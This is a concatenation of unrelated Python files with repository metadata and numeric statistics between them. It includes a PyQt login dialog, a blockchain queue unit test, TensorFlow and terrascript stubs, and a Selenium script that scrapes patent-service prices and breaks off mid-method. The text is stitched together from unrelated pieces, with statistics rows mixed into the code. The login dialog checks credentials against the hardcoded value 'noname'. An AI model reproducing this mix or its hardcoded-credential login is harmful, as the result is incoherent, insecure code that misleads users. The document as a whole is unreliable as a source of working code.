self.commandLinkButton_2.setGeometry(QtCore.QRect(150, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton_2.setFont(font)
self.commandLinkButton_2.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton_2.setCheckable(False)
self.commandLinkButton_2.setDescription("")
self.commandLinkButton_2.setObjectName("commandLinkButton_2")
self.commandLinkButton_3 = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton_3.setGeometry(QtCore.QRect(280, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton_3.setFont(font)
self.commandLinkButton_3.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton_3.setCheckable(False)
self.commandLinkButton_3.setDescription("")
self.commandLinkButton_3.setObjectName("commandLinkButton_3")
self.commandLinkButton = QtWidgets.QCommandLinkButton(Dialog)
self.commandLinkButton.setGeometry(QtCore.QRect(10, 310, 131, 51))
font = QtGui.QFont()
font.setPointSize(18)
self.commandLinkButton.setFont(font)
self.commandLinkButton.setIconSize(QtCore.QSize(25, 25))
self.commandLinkButton.setCheckable(False)
self.commandLinkButton.setDescription("")
self.commandLinkButton.setObjectName("commandLinkButton")
self.label_4 = QtWidgets.QLabel(Dialog)
self.label_4.setGeometry(QtCore.QRect(100, 250, 221, 16))
self.label_4.setObjectName("label_4")
self.pushButton_2 = QtWidgets.QPushButton(Dialog)
self.pushButton_2.setGeometry(QtCore.QRect(130, 270, 151, 41))
self.pushButton_2.setObjectName("pushButton_2")
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
self.label.setText(_translate("Dialog", "User : "))
self.label_2.setText(_translate("Dialog", "Password : "))
self.label_3.setText(_translate("Dialog", "Đuổi hình bắt chữ "))
self.pushButton.setText(_translate("Dialog", "Log in"))
self.pushButton.clicked.connect(self.on_pushButton_clicked)
self.dialog = Version()
self.commandLinkButton_2.setText(_translate("Dialog", "Google"))
self.commandLinkButton_3.setText(_translate("Dialog", "Twitter"))
self.commandLinkButton.setText(_translate("Dialog", "Facebook"))
self.label_4.setText(_translate("Dialog", "Bạn chưa có tài khoản đăng nhập ? "))
self.pushButton_2.setText(_translate("Dialog", "Create free account "))
def on_pushButton_clicked(self):
if self.textEdit.text() == 'noname' and self.textEdit_2.text() == 'noname':
Dialog.hide()
import sys
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QDialog()
self.dialog.ui = Version()
self.dialog.ui.setupUi(dialog)
dialog.show()
dialog.exec_()
else:
ann = QtWidgets.QMessageBox(Dialog)
ann.setText('Incorrect Username or Password. Please try again!')
ann.exec_()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Dialog = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(Dialog)
Dialog.show()
sys.exit(app.exec_())
| 39.290009
| 124
| 0.643765
| 4,813
| 44,437
| 5.847704
| 0.059215
| 0.062356
| 0.066442
| 0.030698
| 0.893551
| 0.863919
| 0.84157
| 0.805223
| 0.797939
| 0.788524
| 0
| 0.050745
| 0.235457
| 44,437
| 1,130
| 125
| 39.324779
| 0.777683
| 0
| 0
| 0.775225
| 0
| 0
| 0.079866
| 0.013345
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070929
| false
| 0.001998
| 0.028971
| 0
| 0.121878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ba642ca97f36651f21275eb950c157fcd3aedffb
| 3,214
|
py
|
Python
|
test/unit/utils/test_blockchain_message_queue.py
|
doubleukay/bxgateway
|
ac01fc9475c039cf4255576dd4ecd6bff6c48f69
|
[
"MIT"
] | 21
|
2019-11-06T17:37:41.000Z
|
2022-03-28T07:18:33.000Z
|
test/unit/utils/test_blockchain_message_queue.py
|
doubleukay/bxgateway
|
ac01fc9475c039cf4255576dd4ecd6bff6c48f69
|
[
"MIT"
] | 4
|
2019-11-06T22:08:00.000Z
|
2021-12-08T06:20:51.000Z
|
test/unit/utils/test_blockchain_message_queue.py
|
doubleukay/bxgateway
|
ac01fc9475c039cf4255576dd4ecd6bff6c48f69
|
[
"MIT"
] | 10
|
2020-08-05T15:58:16.000Z
|
2022-02-07T23:51:10.000Z
|
import time
from unittest import TestCase
from mock import MagicMock
from bxcommon.messages.bloxroute.ping_message import PingMessage
from bxgateway.utils.blockchain_message_queue import BlockchainMessageQueue
TTL = 10
class BlockchainMessageQueueTest(TestCase):
def setUp(self) -> None:
self.blockchain_message_queue = BlockchainMessageQueue(TTL)
def test_append(self):
message_1 = PingMessage(1)
message_2 = PingMessage(2)
message_3 = PingMessage(3)
self.blockchain_message_queue.append(message_1)
self.assertIn(message_1, self.blockchain_message_queue._queue)
self.blockchain_message_queue.append(message_2)
self.assertIn(message_2, self.blockchain_message_queue._queue)
time.time = MagicMock(return_value=time.time() + TTL + 1)
# appends after timeout should be ignored
self.blockchain_message_queue.append(message_3)
self.assertNotIn(message_3, self.blockchain_message_queue._queue)
def test_get_and_clear_before_timeout(self):
message_1 = PingMessage(1)
message_2 = PingMessage(2)
self.blockchain_message_queue.append(message_1)
self.assertIn(message_1, self.blockchain_message_queue._queue)
self.blockchain_message_queue.append(message_2)
self.assertIn(message_2, self.blockchain_message_queue._queue)
items = self.blockchain_message_queue.pop_items()
self.assertEqual(2, len(items))
self.assertIn(message_1, items)
self.assertIn(message_2, items)
next_items = self.blockchain_message_queue.pop_items()
self.assertEqual(0, len(next_items))
message_3 = PingMessage(3)
self.blockchain_message_queue.append(message_3)
last_items = self.blockchain_message_queue.pop_items()
self.assertEqual(1, len(last_items))
self.assertIn(message_3, last_items)
def test_get_and_clear_after_timeout(self):
message_1 = PingMessage(1)
message_2 = PingMessage(2)
self.blockchain_message_queue.append(message_1)
self.assertIn(message_1, self.blockchain_message_queue._queue)
self.blockchain_message_queue.append(message_2)
self.assertIn(message_2, self.blockchain_message_queue._queue)
time.time = MagicMock(return_value=time.time() + TTL + 1)
items = self.blockchain_message_queue.pop_items()
self.assertEqual(0, len(items))
def test_get_and_clear_reenables_insert(self):
message_1 = PingMessage(1)
message_2 = PingMessage(2)
message_3 = PingMessage(3)
self.blockchain_message_queue.append(message_1)
self.assertIn(message_1, self.blockchain_message_queue._queue)
time.time = MagicMock(return_value=time.time() + TTL + 1)
# appends after timeout should be ignored
self.blockchain_message_queue.append(message_2)
self.assertNotIn(message_2, self.blockchain_message_queue._queue)
items = self.blockchain_message_queue.pop_items()
self.assertEqual(0, len(items))
self.blockchain_message_queue.append(message_3)
self.assertIn(message_3, self.blockchain_message_queue._queue)
| 34.55914
| 75
| 0.722775
| 399
| 3,214
| 5.493734
| 0.135338
| 0.217153
| 0.281022
| 0.320255
| 0.782391
| 0.774179
| 0.755474
| 0.719434
| 0.694799
| 0.670164
| 0
| 0.02163
| 0.194462
| 3,214
| 92
| 76
| 34.934783
| 0.825029
| 0.02458
| 0
| 0.606557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.295082
| 1
| 0.081967
| false
| 0
| 0.081967
| 0
| 0.180328
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bac853b69c7aff474b90d00ca7bf3954f7dbf900
| 170
|
py
|
Python
|
databutler/pat/astlib/position.py
|
rbavishi/databutler
|
222263672dae8b519d0592a6bbe68a01dc4ce95d
|
[
"BSD-2-Clause"
] | null | null | null |
databutler/pat/astlib/position.py
|
rbavishi/databutler
|
222263672dae8b519d0592a6bbe68a01dc4ce95d
|
[
"BSD-2-Clause"
] | 1
|
2022-02-11T06:19:45.000Z
|
2022-02-11T06:19:45.000Z
|
databutler/pat/astlib/position.py
|
rbavishi/databutler
|
222263672dae8b519d0592a6bbe68a01dc4ce95d
|
[
"BSD-2-Clause"
] | null | null | null |
import attr
@attr.s
class NodePosition:
line_start: int = attr.ib()
column_start: int = attr.ib()
line_end: int = attr.ib()
column_end: int = attr.ib()
| 17
| 33
| 0.635294
| 26
| 170
| 4
| 0.423077
| 0.269231
| 0.346154
| 0.269231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.229412
| 170
| 9
| 34
| 18.888889
| 0.793893
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.142857
| 0
| 0.857143
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
240ecaa9bac8556fb675cccbdfb531ff5a57c2d2
| 107
|
py
|
Python
|
terrascript/fastly/r.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/fastly/r.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/fastly/r.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | 1
|
2018-11-15T16:23:05.000Z
|
2018-11-15T16:23:05.000Z
|
from terrascript import _resource
class fastly_service_v1(_resource): pass
service_v1 = fastly_service_v1
| 21.4
| 40
| 0.859813
| 15
| 107
| 5.666667
| 0.6
| 0.317647
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 0.102804
| 107
| 4
| 41
| 26.75
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
241cebb70b001a893bdf0a7abdd5c6f202e6e69a
| 1,849
|
py
|
Python
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/losses/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 2
|
2019-08-04T20:28:14.000Z
|
2019-10-27T23:26:42.000Z
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/losses/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | null | null | null |
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/compat/v1/losses/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 1
|
2020-11-04T03:16:29.000Z
|
2020-11-04T03:16:29.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Loss operations for use in neural networks.
Note: All the losses are added to the `GraphKeys.LOSSES` collection by default.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.ops.losses.losses_impl import Reduction
from tensorflow.python.ops.losses.losses_impl import absolute_difference
from tensorflow.python.ops.losses.losses_impl import compute_weighted_loss
from tensorflow.python.ops.losses.losses_impl import cosine_distance
from tensorflow.python.ops.losses.losses_impl import hinge_loss
from tensorflow.python.ops.losses.losses_impl import huber_loss
from tensorflow.python.ops.losses.losses_impl import log_loss
from tensorflow.python.ops.losses.losses_impl import mean_pairwise_squared_error
from tensorflow.python.ops.losses.losses_impl import mean_squared_error
from tensorflow.python.ops.losses.losses_impl import sigmoid_cross_entropy
from tensorflow.python.ops.losses.losses_impl import softmax_cross_entropy
from tensorflow.python.ops.losses.losses_impl import sparse_softmax_cross_entropy
from tensorflow.python.ops.losses.util import add_loss
from tensorflow.python.ops.losses.util import get_losses
from tensorflow.python.ops.losses.util import get_regularization_loss
from tensorflow.python.ops.losses.util import get_regularization_losses
from tensorflow.python.ops.losses.util import get_total_loss
del _print_function
from tensorflow.python.util import module_wrapper as _module_wrapper
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
_sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
_sys.modules[__name__], "compat.v1.losses", public_apis=None, deprecation=False,
has_lite=False)
| 47.410256
| 86
| 0.850189
| 269
| 1,849
| 5.565056
| 0.312268
| 0.203073
| 0.240481
| 0.261189
| 0.661991
| 0.661991
| 0.661991
| 0.655311
| 0.49833
| 0.152305
| 0
| 0.00059
| 0.083288
| 1,849
| 38
| 87
| 48.657895
| 0.882596
| 0.135749
| 0
| 0
| 1
| 0
| 0.010069
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.8
| 0
| 0.8
| 0.08
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
244fa00a3a503f58fad014c0de641e3905c71dc1
| 121
|
py
|
Python
|
integration/tests/error_assert_base64.py
|
youhavethewrong/hurl
|
91cc14882a5f1ef7fa86be09a9f5581cef680559
|
[
"Apache-2.0"
] | 1,013
|
2020-08-27T12:38:48.000Z
|
2022-03-31T23:12:23.000Z
|
integration/tests/error_assert_base64.py
|
youhavethewrong/hurl
|
91cc14882a5f1ef7fa86be09a9f5581cef680559
|
[
"Apache-2.0"
] | 217
|
2020-08-31T11:18:10.000Z
|
2022-03-30T17:50:30.000Z
|
integration/tests/error_assert_base64.py
|
youhavethewrong/hurl
|
91cc14882a5f1ef7fa86be09a9f5581cef680559
|
[
"Apache-2.0"
] | 54
|
2020-09-02T09:41:06.000Z
|
2022-03-19T15:33:05.000Z
|
from tests import app
@app.route("/error-assert-base64")
def error_assert_base64():
return 'line1\nline2\r\nline3\n'
| 24.2
| 36
| 0.743802
| 19
| 121
| 4.631579
| 0.789474
| 0.25
| 0.386364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064815
| 0.107438
| 121
| 5
| 36
| 24.2
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.352459
| 0.188525
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
2469e6d51f742f8ffd4f2ac2fc412d507caeb233
| 111
|
py
|
Python
|
iwg_blog/blog/admin/__init__.py
|
razortheory/who-iwg-webapp
|
e2318d286cd9ab87d4d8103bc7b3072cfb99bf76
|
[
"MIT"
] | null | null | null |
iwg_blog/blog/admin/__init__.py
|
razortheory/who-iwg-webapp
|
e2318d286cd9ab87d4d8103bc7b3072cfb99bf76
|
[
"MIT"
] | null | null | null |
iwg_blog/blog/admin/__init__.py
|
razortheory/who-iwg-webapp
|
e2318d286cd9ab87d4d8103bc7b3072cfb99bf76
|
[
"MIT"
] | null | null | null |
from .base import BaseArticleAdmin, ArticleAdmin, SampleArticleAdmin, CategoryAdmin, TagAdmin, SubscriberAdmin
| 55.5
| 110
| 0.864865
| 9
| 111
| 10.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 111
| 1
| 111
| 111
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
03440565f61763a51229549378c3f9adf1b8f575
| 29,872
|
py
|
Python
|
patent.py
|
DongDong-123/zgg_active
|
7b7304bc9391e1d370052087d4ad2e6d05db670c
|
[
"Apache-2.0"
] | null | null | null |
patent.py
|
DongDong-123/zgg_active
|
7b7304bc9391e1d370052087d4ad2e6d05db670c
|
[
"Apache-2.0"
] | null | null | null |
patent.py
|
DongDong-123/zgg_active
|
7b7304bc9391e1d370052087d4ad2e6d05db670c
|
[
"Apache-2.0"
] | null | null | null |
import random
import time
from selenium.webdriver.common.action_chains import ActionChains
from db import DbOperate
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from readConfig import ReadConfig
from selenium.webdriver.chrome.options import Options
from mysqldb import connect
import os
from Common import Common
class FunctionName(type):
def __new__(cls, name, bases, attrs, *args, **kwargs):
count = 0
attrs["__Func__"] = []
for k, v in attrs.items():
# 专利
if "patent_" in k:
attrs["__Func__"].append(k)
count += 1
attrs["__FuncCount__"] = count
return type.__new__(cls, name, bases, attrs)
class Execute(object, metaclass=FunctionName):
def __init__(self):
self.common = Common()
self.timetemp = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime()) # 存储Excel表格文件名编号
self.db = "case"
self.dboperate = DbOperate()
self.windows = None
self.report_path = ReadConfig().save_report()
self.catlog = 1
# 执行下单
def execute_function(self, callback):
try:
eval("self.{}()".format(callback))
except Exception as e:
print("错误信息:", e)
self.common.write_error_log(callback)
time.sleep(0.5)
self.common.write_error_log(str(e))
# # 关闭窗口
# def closed_windows(self, num):
# self.windows = self.common.driver.window_handles
# for n in range(num + 1, len(self.windows)):
# self.common.driver.switch_to.window(self.windows[n])
# self.common.driver.close()
# self.common.driver.switch_to.window(self.windows[num])
# 1 发明专利,实用新型,同日申请
def patent_invention_normal(self):
all_type = [u'发明专利', u'实用新型', u'发明新型同日申请']
type_code = ["patent", "utility", "oneday"]
for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
for num in range(1, 8):
if self.dboperate.is_member(type_code[index], num):
# 服务类型选择,
if num < 4:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[{}]/a".format(num)).click()
case_name1 = self.common.driver.find_element_by_xpath(
".//ul[@id='ulType']/li[{}]/a".format(num)).text
case_name2 = ''
elif num == 4:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[1]/a").click()
# 消除悬浮窗的影响
temp = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[2]/a")
ActionChains(self.common.driver).move_to_element(temp).perform()
self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[1]/a").click()
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[1]/a").text
case_name2 = self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[1]/a").text
elif num == 5:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[2]/a").click()
self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[1]/a").click()
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[2]/a").text
case_name2 = self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[1]/a").text
elif num == 6:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[3]/a").click()
self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[1]/a").click()
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[3]/a").text
case_name2 = self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[1]/a").text
else:
self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").click()
case_name1 = case_name = self.common.driver.find_element_by_xpath(
".//ul[@id='ulType']/li[3]/a").text
case_name2 = self.common.driver.find_element_by_xpath(
".//div[@class='ui-increment-zl']//li[2]/a").text
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
if case_name2:
case_name = '-'.join((case_name1, case_name2))
else:
case_name = case_name1
case_name = "-".join((patent_type, case_name))
# 判断价格是否加载成功
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(type_code[index], num)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 2 外观设计
def patent_design(self):
all_type = [u'外观设计']
type_code = ["design"]
for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
for num in range(1, 7):
if self.dboperate.is_member(type_code[index], num):
# 服务类型选择,
if num <= 3:
self.common.driver.find_element_by_xpath(
".//ul[@id='ulType']/li[{}]/a".format(num)).click()
case_name1 = self.common.driver.find_element_by_xpath(
".//ul[@id='ulType']/li[{}]/a".format(num)).text
case_name2 = ''
elif num == 4:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[1]/a").click()
self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").click()
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[1]/a").text
case_name2 = self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").text
elif num == 5:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[2]/a").click()
self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").click()
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[2]/a").text
case_name2 = self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").text
else:
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[3]/a").click()
self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").click()
case_name1 = self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[3]/a").text
case_name2 = self.common.driver.find_element_by_xpath(".//li[@id='liguarantee']/a").text
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
if case_name2:
case_name = '-'.join((case_name1, case_name2))
else:
case_name = case_name1
case_name = "-".join((patent_type, case_name))
# 判断价格是否加载成功
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(type_code[index], num)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 3 专利申请复审,审查意见答复 -(发明专利,实用新型,外观设计)
def patent_review_invention(self):
all_type = [u'专利申请复审', u'审查意见答复']
type_code = ["patent_recheck", "patent_answer"]
ul_index = [13, 16]
for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
# 业务类型选择
for num in range(1, 4):
if self.dboperate.is_member(type_code[index], num):
self.common.driver.find_element_by_xpath(
".//ul[@p='{}']/li[{}]/a".format(ul_index[index], num)).click()
case_name = self.common.driver.find_element_by_xpath(
".//ul[@p='{}']/li[{}]/a".format(ul_index[index], num)).text
case_name = "-".join((patent_type, case_name))
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(type_code[index], num)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 4 查新检索-国内评估,全球评估,第三方公众意见-无需检索,需要检索
def patent_clue_domestic_1(self):
all_type = [u'查新检索', u'第三方公众意见']
type_code = ["patent_clue", "patent_public"]
for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
# 业务类型选择
for num in range(1, 3):
if self.dboperate.is_member(type_code[index], num):
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[{}]/a".format(num)).click()
case_name = self.common.driver.find_element_by_xpath(
".//ul[@id='ulType']/li[{}]/a".format(num)).text
case_name = "-".join((patent_type, case_name))
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(type_code[index], num)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 5 专利授权前景分析,专利稳定性分析 -(发明专利,实用新型,外观设计)
def patent_warrant_invention_1(self):
all_type = [u'授权前景分析', u'专利稳定性分析']
type_code = ["patent_warrant", "patent_stable"]
for index, patent_type in enumerate(all_type):
if self.dboperate.exists(type_code[index]):
try:
locator = (By.XPATH, "(.//div[@class='fl isnaMar'])[1]")
WebDriverWait(self.common.driver, 30, 0.5).until(EC.element_to_be_clickable(locator))
aa = self.common.driver.find_element_by_xpath("(.//div[@class='fl isnaMar'])[1]")
ActionChains(self.common.driver).move_to_element(aa).perform()
self.common.driver.find_element_by_link_text(patent_type).click()
# 切换至新窗口
self.windows = self.common.driver.window_handles
self.common.driver.switch_to.window(self.windows[-1])
# 业务类型选择
for num in range(1, 4):
if self.dboperate.is_member(type_code[index], num):
self.common.driver.find_element_by_xpath(".//ul[@id='ulType']/li[{}]/a".format(num)).click()
case_name = self.common.driver.find_element_by_xpath(
".//ul[@id='ulType']/li[{}]/a".format(num)).text
case_name = "-".join((patent_type, case_name))
# 数量加1
# self.common.number_add()
# 数量减1
# # self.common.number_minus()
while not self.common.driver.find_element_by_id("totalfee").is_displayed():
time.sleep(0.5)
# 获取详情页 价格
detail_price = self.common.driver.find_element_by_xpath(
"(.//div[@class='sames']//label[@id='totalfee'])").text
print("{}价格".format(case_name), detail_price)
self.dboperate.del_elem(type_code[index], num)
self.common.save_to_mysql([case_name, detail_price, self.catlog])
time.sleep(1)
except Exception as e:
print(e)
self.common.driver.switch_to.window(self.windows[0])
self.common.closed_windows(0)
time.sleep(1)
# 6 利权评价报告-实用新型,外观设计
def patent_evaluate_utility(self):
all_type = [u'专利权评价报告']
type_code = ["patent_evaluate"]
ul_index = [19]
